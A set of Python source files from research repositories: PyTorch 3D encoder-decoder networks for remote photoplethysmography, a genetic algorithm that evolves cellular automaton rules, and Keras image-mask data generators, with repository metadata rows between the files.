x = self.TrConv1(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=64, W=8, H=8]
x = self.TrConv2(x) # [b, F=64, T=64, W=8, H=8]->[b, F=64, T=128, W=8, H=8]
x = self.poolspa(x) # [b, F=64, T=128, W=8, H=8]->[b, F=64, T=128, W=1, H=1]
x = self.ConvBlock5(x) # [b, F=64, T=128, W=1, H=1]->[b, F=1, T=128, W=1, H=1]
rPPG = x.view(-1,x.shape[2]) # [b,128]
return rPPG
#%% 3DED8 (RTrPPG) - Note that 3DED8, 3DED4, and 3DED2 are the same architecture.
class N3DED8(nn.Module):
def __init__(self, frames=128):
super(N3DED8, self).__init__()
self.Conv1 = nn.Sequential(
nn.Conv3d(3, 16, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(16),
nn.ReLU(inplace=True),
)
self.Conv2 = nn.Sequential(
nn.Conv3d(16, 32, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(32),
nn.ReLU(inplace=True),
)
self.Conv3 = nn.Sequential(
nn.Conv3d(32, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.Conv4 = nn.Sequential(
nn.Conv3d(64, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.TrConv1 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.TrConv2 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.ConvBlock5 = nn.Conv3d(64, 1, [1,1,1],stride=1, padding=0)
self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
self.poolspa = nn.AdaptiveAvgPool3d((frames,1,1))
def forward(self, x): # [batch, Features=3, Temp=128, Width=8, Height=8]
# ENCODER
x = self.Conv1(x) # [b, F=3, T=128, W=8, H=8]->[b, F=16, T=128, W=8, H=8]
x = self.MaxpoolTem_211_211(x) # [b, F=16, T=128, W=8, H=8]->[b, F=16, T=64, W=8, H=8]
x = self.Conv2(x) # [b, F=16, T=64, W=8, H=8]->[b, F=32, T=64, W=8, H=8]
x = self.MaxpoolTem_211_211(x) # [b, F=32, T=64, W=8, H=8]->[b, F=32, T=32, W=8, H=8]
x = self.Conv3(x) # [b, F=32, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
x = self.Conv4(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
# DECODER
x = self.TrConv1(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=64, W=8, H=8]
x = self.TrConv2(x) # [b, F=64, T=64, W=8, H=8]->[b, F=64, T=128, W=8, H=8]
x = self.poolspa(x) # [b, F=64, T=128, W=8, H=8]->[b, F=64, T=128, W=1, H=1]
x = self.ConvBlock5(x) # [b, F=64, T=128, W=1, H=1]->[b, F=1, T=128, W=1, H=1]
rPPG = x.view(-1,x.shape[2]) # [b,128]
return rPPG
#%% 3DED4 - Note that 3DED8, 3DED4, and 3DED2 are the same architecture.
class N3DED4(nn.Module):
def __init__(self, frames=128):
super(N3DED4, self).__init__()
self.Conv1 = nn.Sequential(
nn.Conv3d(3, 16, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(16),
nn.ReLU(inplace=True),
)
self.Conv2 = nn.Sequential(
nn.Conv3d(16, 32, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(32),
nn.ReLU(inplace=True),
)
self.Conv3 = nn.Sequential(
nn.Conv3d(32, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.Conv4 = nn.Sequential(
nn.Conv3d(64, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.TrConv1 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.TrConv2 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.ConvBlock5 = nn.Conv3d(64, 1, [1,1,1],stride=1, padding=0)
self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
self.poolspa = nn.AdaptiveAvgPool3d((frames,1,1))
def forward(self, x): # [batch, Features=3, Temp=128, Width=4, Height=4]
# ENCODER
x = self.Conv1(x) # [b, F=3, T=128, W=4, H=4]->[b, F=16, T=128, W=4, H=4]
x = self.MaxpoolTem_211_211(x) # [b, F=16, T=128, W=4, H=4]->[b, F=16, T=64, W=4, H=4]
x = self.Conv2(x) # [b, F=16, T=64, W=4, H=4]->[b, F=32, T=64, W=4, H=4]
x = self.MaxpoolTem_211_211(x) # [b, F=32, T=64, W=4, H=4]->[b, F=32, T=32, W=4, H=4]
x = self.Conv3(x) # [b, F=32, T=32, W=4, H=4]->[b, F=64, T=32, W=4, H=4]
x = self.Conv4(x) # [b, F=64, T=32, W=4, H=4]->[b, F=64, T=32, W=4, H=4]
# DECODER
x = self.TrConv1(x) # [b, F=64, T=32, W=4, H=4]->[b, F=64, T=64, W=4, H=4]
x = self.TrConv2(x) # [b, F=64, T=64, W=4, H=4]->[b, F=64, T=128, W=4, H=4]
x = self.poolspa(x) # [b, F=64, T=128, W=4, H=4]->[b, F=64, T=128, W=1, H=1]
x = self.ConvBlock5(x) # [b, F=64, T=128, W=1, H=1]->[b, F=1, T=128, W=1, H=1]
rPPG = x.view(-1,x.shape[2]) # [b,128]
return rPPG
#%% 3DED2 - Note that 3DED8, 3DED4, and 3DED2 are the same architecture.
class N3DED2(nn.Module):
def __init__(self, frames=128):
super(N3DED2, self).__init__()
self.Conv1 = nn.Sequential(
nn.Conv3d(3, 16, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(16),
nn.ReLU(inplace=True),
)
self.Conv2 = nn.Sequential(
nn.Conv3d(16, 32, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(32),
nn.ReLU(inplace=True),
)
self.Conv3 = nn.Sequential(
nn.Conv3d(32, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.Conv4 = nn.Sequential(
nn.Conv3d(64, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.TrConv1 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.TrConv2 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.ConvBlock5 = nn.Conv3d(64, 1, [1,1,1],stride=1, padding=0)
self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
self.poolspa = nn.AdaptiveAvgPool3d((frames,1,1))
def forward(self, x): # [batch, Features=3, Temp=128, Width=2, Height=2]
# ENCODER
x = self.Conv1(x) # [b, F=3, T=128, W=2, H=2]->[b, F=16, T=128, W=2, H=2]
x = self.MaxpoolTem_211_211(x) # [b, F=16, T=128, W=2, H=2]->[b, F=16, T=64, W=2, H=2]
x = self.Conv2(x) # [b, F=16, T=64, W=2, H=2]->[b, F=32, T=64, W=2, H=2]
x = self.MaxpoolTem_211_211(x) # [b, F=32, T=64, W=2, H=2]->[b, F=32, T=32, W=2, H=2]
x = self.Conv3(x) # [b, F=32, T=32, W=2, H=2]->[b, F=64, T=32, W=2, H=2]
x = self.Conv4(x) # [b, F=64, T=32, W=2, H=2]->[b, F=64, T=32, W=2, H=2]
# DECODER
x = self.TrConv1(x) # [b, F=64, T=32, W=2, H=2]->[b, F=64, T=64, W=2, H=2]
x = self.TrConv2(x) # [b, F=64, T=64, W=2, H=2]->[b, F=64, T=128, W=2, H=2]
x = self.poolspa(x) # [b, F=64, T=128, W=2, H=2]->[b, F=64, T=128, W=1, H=1]
x = self.ConvBlock5(x) # [b, F=64, T=128, W=1, H=1]->[b, F=1, T=128, W=1, H=1]
rPPG = x.view(-1,x.shape[2]) # [b,128]
return rPPG
#%% DEBUGGING
def clear_gpu():
import gc
gc.collect()
torch.cuda.empty_cache()
def stand_alone():
"""
This function should be use for debugging purposes only
model_name(str): model to be used
device(str): device where the test will be performed. "CPU", "GPU", or "auto"
batch_size(int): batch size
"""
# Set your flags manually
model_name = 'N3DED8' # 'N3DED128', 'N3DED64', 'N3DED32', 'N3DED16', 'N3DED8', 'N3DED4', 'N3DED2'
device = 'auto'# 'CPU','GPU','auto'
batch_size = 8
# Set device
if device in ['auto']:
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
elif device in ['GPU']:
device = torch.device("cuda:0")
clear_gpu()
# Set model
Channels = 3
T = 128
if model_name in ['N3DED128']:
model = N3DED128()
Width = 128
Height = 128
elif model_name in ['N3DED64']:
model = N3DED64()
Width = 64
Height = 64
elif model_name in ['N3DED32']:
model = N3DED32()
Width = 32
Height = 32
elif model_name in ['N3DED16']:
model = N3DED16()
Width = 16
Height = 16
elif model_name in ['N3DED8']:
model = N3DED8()
Width = 8
Height = 8
elif model_name in ['N3DED4']:
model = N3DED4()
Width = 4
Height = 4
elif model_name in ['N3DED2']:
model = N3DED2()
Width = 2
Height = 2
x = torch.randn((batch_size,Channels,T,Width,Height),device=device,dtype=torch.float32)
print(f'[Debug] Testing {model_name} in {device}. input=[b={batch_size},F={Channels},T={T},W={Width},H={Height}]')
# Run the model
model.to(device)
y = model(x)
if __name__ == "__main__":
stand_alone()
| 39.479779
| 134
| 0.475718
| 3,490
| 21,477
| 2.87765
| 0.041261
| 0.02788
| 0.02091
| 0.03485
| 0.879219
| 0.874838
| 0.874838
| 0.874838
| 0.844369
| 0.831524
| 0
| 0.160326
| 0.326815
| 21,477
| 544
| 135
| 39.479779
| 0.534306
| 0.241607
| 0
| 0.730479
| 0
| 0.002519
| 0.011837
| 0.003842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040302
| false
| 0
| 0.007557
| 0
| 0.083123
| 0.002519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb4adf5b19b36fccfb35f9af0b28fc37ac4880c1
| 188
|
py
|
Python
|
utils/__init__.py
|
yamamura-k/MetaHeuristics
|
abc6da4c0d9886260425124dfcee2a92b833446f
|
[
"MIT"
] | 1
|
2021-09-14T04:28:18.000Z
|
2021-09-14T04:28:18.000Z
|
utils/__init__.py
|
yamamura-k/MetaHeuristics
|
abc6da4c0d9886260425124dfcee2a92b833446f
|
[
"MIT"
] | 6
|
2021-07-01T01:13:43.000Z
|
2021-07-15T14:26:46.000Z
|
utils/__init__.py
|
yamamura-k/MetaHeuristics
|
abc6da4c0d9886260425124dfcee2a92b833446f
|
[
"MIT"
] | null | null | null |
from utils.base import *
from utils.common import *
from utils.grad_based import *
from utils.logging import setup_logger
from utils.parallel import *
from utils.parameter_search import *
| 26.857143
| 38
| 0.81383
| 28
| 188
| 5.357143
| 0.464286
| 0.36
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 188
| 6
| 39
| 31.333333
| 0.914634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fb9466e7900c3b2017fb7a7137bf6e36d38a4dfb
| 10,128
|
py
|
Python
|
evodynamic/evolution/ga.py
|
SocratesNFR/evodynamic
|
682b610096182bde2298cdca352e7b319a0e4c41
|
[
"Apache-2.0"
] | 9
|
2019-06-07T22:57:07.000Z
|
2022-01-17T12:35:08.000Z
|
evodynamic/evolution/ga.py
|
SocratesNFR/evodynamic
|
682b610096182bde2298cdca352e7b319a0e4c41
|
[
"Apache-2.0"
] | null | null | null |
evodynamic/evolution/ga.py
|
SocratesNFR/evodynamic
|
682b610096182bde2298cdca352e7b319a0e4c41
|
[
"Apache-2.0"
] | 4
|
2020-09-02T16:17:58.000Z
|
2021-12-05T21:28:32.000Z
|
"""
Genetic algorithm
- Generate random genomes
- Evaluate genomes
- Select genomes and reproduce them
* Code based on https://github.com/PytLab/gaft/blob/master/gaft
"""
import numpy as np
import random
import time
import csv
def evolve_rules(evaluate_genome, pop_size=10, generation=4, gene_range=[0,255]):
"""
Genetic algorithm for evolving rules of a 1D cellular automaton.
The genome is a list of int that is initialized with 1 to 5 elements (genes).
Each gene represents a rule that is executed in sequence for one time step.
Genes can be added or removed depending on their propabilities.
This function returns the best genome. It also saves the log of the evolution
in a csv file.
Parameters
----------
evaluate_genome : function
Function that returns the fitness score of the genome.
pop_size : int
Size of the population.
generation : int
Maximum number of generations.
gene_range : list with 2 elements
List containing the range of the gene values.
Returns
-------
best_genome : list
Best genome of entire evolution process.
"""
assert pop_size%2==0, "Error: pop_size must be even!"
timestr = time.strftime("%Y%m%d-%H%M%S")
filehistory = open("evo_rules_"+timestr+".txt", "w", newline="")
wr = csv.writer(filehistory, delimiter=";")
wr.writerow(["generation", "fitness", "val_dict", "genome"])
prob_crossover = 0.8
prob_exchange = 0.5
prob_mutate_gene = 0.1
prob_add_gene = 0.1
prob_delete_gene = 0.1
pop_indices = list(range(pop_size))
pop_list = [[np.random.randint(gene_range[0], gene_range[1]+1) for gene in range(np.random.randint(1,5))] for pop in range(pop_size)]
fitness_list = []
val_dict_list = []
for genome in pop_list:
fitness_score, val_dict = evaluate_genome(genome)
fitness_list.append(fitness_score)
val_dict_list.append(val_dict)
wr.writerow(["0", str(fitness_score), str(val_dict), str(genome)])
best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
best_genome = pop_list[best_genome_idx].copy()
best_genome_fitness = fitness_list[best_genome_idx]
best_val_dict = val_dict_list[best_genome_idx].copy()
for gen in range(generation):
new_pop_list = []
new_fitness_list = []
new_val_dict_list = []
for _ in range(pop_size//2):
# Tournament selection
group1 = random.sample(pop_indices, 2)
group2 = random.sample(pop_indices, 2)
selected1 = max(group1, key=lambda idx: fitness_list[idx])
selected2 = max(group2, key=lambda idx: fitness_list[idx])
genome1 = pop_list[selected1]
genome2 = pop_list[selected2]
for i, (gene1, gene2) in enumerate(zip(genome1, genome2)):
# Crossover
if prob_crossover > np.random.random():
# Exchange of genes
if prob_exchange > np.random.random():
genome1[i] = gene2
genome2[i] = gene1
# Mutate gene 1
if prob_mutate_gene > np.random.random():
genome1[i] = (genome1[i] + np.random.randint(-25, 26)) % 255
# Mutate gene 2
if prob_mutate_gene > np.random.random():
genome2[i] = (genome2[i] + np.random.randint(-25, 26)) % 255
# Add gene to genome 1
if prob_add_gene > np.random.random():
genome1.append(np.random.randint(gene_range[0], gene_range[1]+1))
# Add gene to genome 2
if prob_add_gene > np.random.random():
genome2.append(np.random.randint(gene_range[0], gene_range[1]+1))
# Delete gene from genome 1
if prob_delete_gene > np.random.random() and len(genome1)>1:
del genome1[np.random.randint(len(genome1))]
# Delete gene from genome 2
if prob_delete_gene > np.random.random() and len(genome2)>1:
del genome2[np.random.randint(len(genome2))]
# Add new genomes for next generation
new_pop_list.append(genome1)
new_pop_list.append(genome2)
# Evaluate new genomes
fitness_genome1, val_dict1 = evaluate_genome(genome1)
fitness_genome2, val_dict2 = evaluate_genome(genome2)
new_fitness_list.append(fitness_genome1)
new_fitness_list.append(fitness_genome2)
new_val_dict_list.append(val_dict1)
new_val_dict_list.append(val_dict2)
wr.writerow([str(gen+1), str(fitness_genome1), str(val_dict1), str(genome1)])
wr.writerow([str(gen+1), str(fitness_genome2), str(val_dict2), str(genome2)])
pop_list = new_pop_list
fitness_list = new_fitness_list
val_dict_list = new_val_dict_list
generation_best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
if fitness_list[generation_best_genome_idx] > best_genome_fitness:
best_genome = pop_list[generation_best_genome_idx].copy()
best_genome_fitness = fitness_list[generation_best_genome_idx]
best_val_dict = val_dict_list[generation_best_genome_idx].copy()
print("PARTIAL generation_best_genome_idx", generation_best_genome_idx)
print("PARTIAL best_genome", best_genome)
print("PARTIAL new_pop_list[generation_best_genome_idx]", new_pop_list[generation_best_genome_idx])
print("PARTIAL best_genome_fitness", best_genome_fitness)
print("PARTIAL new_fitness_list[idx]", new_fitness_list[generation_best_genome_idx])
print("PARTIAL new_pop_list[generation_best_genome_idx]", new_pop_list[generation_best_genome_idx])
print("PARTIAL best_val_dict", best_val_dict)
print("best_genome", best_genome)
print("best_genome_fitness", best_genome_fitness)
print("best_val_dict", best_val_dict)
filehistory.close()
return best_genome
def evolve_probability(evaluate_genome, pop_size=10, generation=10, prob_size=8):
"""
Genetic algorithm for evolving rules of a 1D stochastic cellular automaton.
The genome is a list of float that has 8 genes.
Each gene represents the probability of the state becoming one for each
neighborhood pattern.
This function returns the best genome. It also saves the log of the evolution
in a csv file.
Parameters
----------
evaluate_genome : function
Function that returns the fitness score of the genome.
pop_size : int
Size of the population.
generation : int
Maximum number of generations.
prob_size : int
Size of the genome containing the probabilities.
Returns
-------
best_genome : list
Best genome of entire evolution process.
"""
assert pop_size%2==0, "Error: pop_size must be even!"
timestr = time.strftime("%Y%m%d-%H%M%S")
filehistory = open("evo_prob_"+timestr+".txt", "w", newline="")
wr = csv.writer(filehistory, delimiter=";")
wr.writerow(["generation", "fitness", "val_dict", "genome"])
prob_crossover = 0.8
prob_exchange = 0.5
prob_mutate_gene = 0.1
pop_indices = list(range(pop_size))
pop_list = [[np.random.rand() for gene in range(prob_size)] for pop in range(pop_size)]
fitness_list = []
val_dict_list = []
for genome in pop_list:
fitness_score, val_dict = evaluate_genome(genome)
fitness_list.append(fitness_score)
val_dict_list.append(val_dict)
wr.writerow(["0", str(fitness_score), str(val_dict), str(genome)])
best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
best_genome = pop_list[best_genome_idx].copy()
best_genome_fitness = fitness_list[best_genome_idx]
best_val_dict = val_dict_list[best_genome_idx].copy()
for gen in range(generation):
new_pop_list = []
new_fitness_list = []
new_val_dict_list = []
for _ in range(pop_size//2):
# Tournament selection
group1 = random.sample(pop_indices, 2)
group2 = random.sample(pop_indices, 2)
selected1 = max(group1, key=lambda idx: fitness_list[idx])
selected2 = max(group2, key=lambda idx: fitness_list[idx])
genome1 = pop_list[selected1]
genome2 = pop_list[selected2]
for i, (gene1, gene2) in enumerate(zip(genome1, genome2)):
# Crossover
if prob_crossover > np.random.random():
# Exchange of genes
if prob_exchange > np.random.random():
genome1[i] = gene2
genome2[i] = gene1
# Mutate gene 1
if prob_mutate_gene > np.random.random():
genome1[i] = np.clip(genome1[i] + np.random.normal(scale=0.2), 0.,1.)
# Mutate gene 2
if prob_mutate_gene > np.random.random():
genome2[i] = np.clip(genome2[i] + np.random.normal(scale=0.2), 0.,1.)
# Add new genomes for next generation
new_pop_list.append(genome1)
new_pop_list.append(genome2)
# Evaluate new genomes
fitness_genome1, val_dict1 = evaluate_genome(genome1)
fitness_genome2, val_dict2 = evaluate_genome(genome2)
new_fitness_list.append(fitness_genome1)
new_fitness_list.append(fitness_genome2)
new_val_dict_list.append(val_dict1)
new_val_dict_list.append(val_dict2)
wr.writerow([str(gen+1), str(fitness_genome1), str(val_dict1), str(genome1)])
wr.writerow([str(gen+1), str(fitness_genome2), str(val_dict2), str(genome2)])
pop_list = new_pop_list
fitness_list = new_fitness_list
val_dict_list = new_val_dict_list
generation_best_genome_idx = max(pop_indices, key=lambda idx: fitness_list[idx])
if fitness_list[generation_best_genome_idx] > best_genome_fitness:
best_genome = pop_list[generation_best_genome_idx].copy()
best_genome_fitness = fitness_list[generation_best_genome_idx]
best_val_dict = val_dict_list[generation_best_genome_idx].copy()
print("PARTIAL generation_best_genome_idx", generation_best_genome_idx)
print("PARTIAL best_genome", best_genome)
print("PARTIAL new_pop_list[generation_best_genome_idx]", new_pop_list[generation_best_genome_idx])
print("PARTIAL best_genome_fitness", best_genome_fitness)
print("PARTIAL new_fitness_list[idx]", new_fitness_list[generation_best_genome_idx])
print("PARTIAL best_val_dict", best_val_dict)
print("best_genome", best_genome)
print("best_genome_fitness", best_genome_fitness)
print("best_val_dict", best_val_dict)
filehistory.close()
return best_genome
| 36.171429
| 135
| 0.706359
| 1,464
| 10,128
| 4.611339
| 0.120902
| 0.094801
| 0.057769
| 0.074952
| 0.868908
| 0.864465
| 0.854688
| 0.839876
| 0.818545
| 0.80077
| 0
| 0.022044
| 0.189277
| 10,128
| 279
| 136
| 36.301075
| 0.800146
| 0.191252
| 0
| 0.859873
| 1
| 0
| 0.08292
| 0.026525
| 0
| 0
| 0
| 0
| 0.012739
| 1
| 0.012739
| false
| 0
| 0.025478
| 0
| 0.050955
| 0.121019
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83a15aa2abcb648a9b2272d01fcd878b245082ff
| 24,424
|
py
|
Python
|
cosmiq_sn4_baseline/DataGenerator.py
|
lee-joey-hyunjoon/CosmiQ_SN4_Baseline
|
7b29c98335eaa3574a0bfbc58d297de2e0e5d95a
|
[
"Apache-2.0"
] | 21
|
2018-10-29T15:13:36.000Z
|
2022-01-07T04:23:06.000Z
|
cosmiq_sn4_baseline/DataGenerator.py
|
lee-joey-hyunjoon/CosmiQ_SN4_Baseline
|
7b29c98335eaa3574a0bfbc58d297de2e0e5d95a
|
[
"Apache-2.0"
] | 5
|
2018-11-01T01:55:42.000Z
|
2020-06-11T07:28:43.000Z
|
cosmiq_sn4_baseline/DataGenerator.py
|
lee-joey-hyunjoon/CosmiQ_SN4_Baseline
|
7b29c98335eaa3574a0bfbc58d297de2e0e5d95a
|
[
"Apache-2.0"
] | 8
|
2018-11-02T09:18:18.000Z
|
2021-03-01T11:57:16.000Z
|
import keras
import cv2
import numpy as np
import os
class DataGenerator(keras.utils.Sequence):
"""Data generator to produce matching image-mask pairs from the generator array."""
def __init__(self, image_arr, mask_arr, batch_size=32, crop=False,
output_x=256, output_y=256, shuffle=True, flip_x=False,
zoom_range=None, flip_y=False, rotate=False,
rescale_brightness=None, output_dir=''):
self.images = image_arr
self.masks = mask_arr
self.batch_size = batch_size
self.initial_width = image_arr.shape[2]
self.initial_height = image_arr.shape[1]
self.output_x = output_x
self.output_y = output_y
self.crop = crop
self.shuffle = shuffle
self.flip_x = flip_x
self.flip_y = flip_y
self.rotate = rotate
self.zoom_range = zoom_range
self.output_dir = output_dir
self.output_ctr = 0
self.rescale_brightness = rescale_brightness
self.on_epoch_end()
def on_epoch_end(self):
'Update indices, rotations, etc. after each epoch'
# select one collect per image
self.collect_indexes = np.random.choice(
np.arange(self.images.shape[0]),
size=self.images.shape[1])
if self.shuffle:
np.random.shuffle(self.collect_indexes)
# reorder images
self.image_indexes = np.arange(self.images.shape[1])
if self.shuffle:
np.random.shuffle(self.image_indexes)
if self.crop:
self.x_mins = np.random.randint(
0, self.images.shape[3]-self.output_x, size=self.batch_size
)
self.y_mins = np.random.randint(
0, self.images.shape[2] - self.output_y, size=self.batch_size
)
if self.flip_x:
self.x_flips = np.random.choice(
[False, True], size=self.batch_size
)
if self.flip_y:
self.y_flips = np.random.choice(
[False, True], size=self.batch_size
)
if self.rotate:
self.n_rotations = np.random.choice(
[0, 1, 2, 3], size=self.batch_size
)
if self.rescale_brightness is not None:
self.amt_to_scale = np.random.uniform(
low=self.rescale_brightness[0],
high=self.rescale_brightness[1],
size=self.batch_size
)
if self.zoom_range is not None:
if (1-self.zoom_range)*self.images.shape[2] < self.output_y:
self.zoom_range = self.output_y/self.images.shape[2]
if (1-self.zoom_range)*self.images.shape[3] < self.output_x:
self.zoom_range = self.output_x/self.images.shape[3]
self.zoom_amt_y = np.random.uniform(
low=1-self.zoom_range,
high=1+self.zoom_range,
size=self.batch_size
)
self.zoom_amt_x = np.random.uniform(
low=1-self.zoom_range,
high=1+self.zoom_range,
size=self.batch_size
)
def _data_generation(self, collect_idxs, image_idxs):
# initialize
X = np.empty((self.batch_size, self.output_y, self.output_x,
self.images.shape[4]))
y = np.empty((self.batch_size, self.output_y, self.output_x,
self.masks.shape[3]))
for i in range(self.batch_size):
curr_im = self.images[collect_idxs[i],
image_idxs[i],
:, :, :]
curr_mask = self.masks[image_idxs[i], :, :, :]
if self.zoom_range is not None:
curr_im = cv2.resize(
curr_im,
(int(curr_im.shape[1]*self.zoom_amt_x[i]),
int(curr_im.shape[0]*self.zoom_amt_y[i])))
curr_mask = cv2.resize(
curr_mask.astype('uint8'),
(int(curr_mask.shape[1]*self.zoom_amt_x[i]),
int(curr_mask.shape[0]*self.zoom_amt_y[i])))
if len(curr_mask.shape) < 3: # add third axis if absent
curr_mask = curr_mask[:, :, np.newaxis]
curr_mask = curr_mask > 0
pad_amt = [0, 0]
if self.zoom_amt_y[i] < 1:
pad_amt[0] = int(self.images.shape[2]*self.zoom_amt_y[i]*0.5)
if self.zoom_amt_x[i] < 1:
pad_amt[1] = int(self.images.shape[3]*self.zoom_amt_x[i]*0.5)
if pad_amt != [0, 0]:
curr_mask = np.pad(
curr_mask,
pad_width=((pad_amt[0], pad_amt[0]),
(pad_amt[1], pad_amt[1]),
(0, 0)),
mode='reflect')
curr_im = np.pad(
curr_im,
pad_width=((pad_amt[0], pad_amt[0]),
(pad_amt[1], pad_amt[1]),
(0, 0)),
mode='reflect')
if self.crop:
curr_im = curr_im[self.y_mins[i]:self.y_mins[i]+self.output_y,
self.x_mins[i]:self.x_mins[i]+self.output_x,
:]
curr_mask = curr_mask[
self.y_mins[i]:self.y_mins[i]+self.output_y,
self.x_mins[i]:self.x_mins[i]+self.output_x,
:]
else:
curr_im = cv2.resize(curr_im, (self.output_y, self.output_x,
self.images.shape[2]))
curr_mask = cv2.resize(curr_im, (self.output_y, self.output_x,
self.masks.shape[2]))
if self.flip_x:
if self.x_flips[i]:
curr_im = np.flip(curr_im, axis=0)
curr_mask = np.flip(curr_mask, axis=0)
if self.flip_y:
if self.y_flips[i]:
curr_im = np.flip(curr_im, axis=1)
curr_mask = np.flip(curr_mask, axis=1)
if self.rotate:
to_go = 0
while to_go < self.n_rotations[i]:
curr_im = np.rot90(curr_im)
curr_mask = np.rot90(curr_mask)
to_go += 1
if self.rescale_brightness is not None:
hsv = cv2.cvtColor(curr_im, cv2.COLOR_BGR2HSV)
v = hsv[:, :, 2]*self.amt_to_scale[i]
v = np.clip(v, 0, 255).astype('uint8')
hsv[:, :, 2] = v
curr_im = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
X[i, :, :, :] = curr_im
y[i, :, :, :] = curr_mask
X = X/255.
return X, y
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(self.images.shape[1]/self.batch_size))
def __getitem__(self, index):
'Generate one batch of data'
# Generate indexes of the batch
col_inds = self.collect_indexes[index*self.batch_size:(index+1)*self.batch_size]
im_inds = self.image_indexes[index*self.batch_size:(index+1)*self.batch_size]
# Generate data
X, y = self._data_generation(collect_idxs=col_inds, image_idxs=im_inds)
if self.output_dir:
np.save(os.path.join(
self.output_dir, 'images_{}.npy'.format(self.output_ctr)),
X)
np.save(os.path.join(
self.output_dir, 'masks_{}.npy'.format(self.output_ctr)),
y)
self.output_ctr += 1
return X, y
class FlatDataGenerator(keras.utils.Sequence):
"""Data generator to produce matching image-mask pairs from the generator array."""
def __init__(self, image_arr, mask_arr, batch_size=32, crop=False,
output_x=256, output_y=256, shuffle=True, flip_x=False,
zoom_range=None, flip_y=False, rotate=False,
rescale_brightness=None, output_dir=''):
self.images = image_arr
self.masks = mask_arr
self.batch_size = batch_size
self.initial_width = image_arr.shape[2]
self.initial_height = image_arr.shape[1]
self.output_x = output_x
self.output_y = output_y
self.crop = crop
self.shuffle = shuffle
self.flip_x = flip_x
self.flip_y = flip_y
self.rotate = rotate
self.zoom_range = zoom_range
self.output_dir = output_dir
self.output_ctr = 0
self.rescale_brightness = rescale_brightness
self.on_epoch_end()
def on_epoch_end(self):
'Update indices, rotations, etc. after each epoch'
# reorder images
self.image_indexes = np.arange(self.images.shape[0])
if self.shuffle:
np.random.shuffle(self.image_indexes)
if self.crop:
self.x_mins = np.random.randint(
0, self.images.shape[2]-self.output_x, size=self.batch_size
)
self.y_mins = np.random.randint(
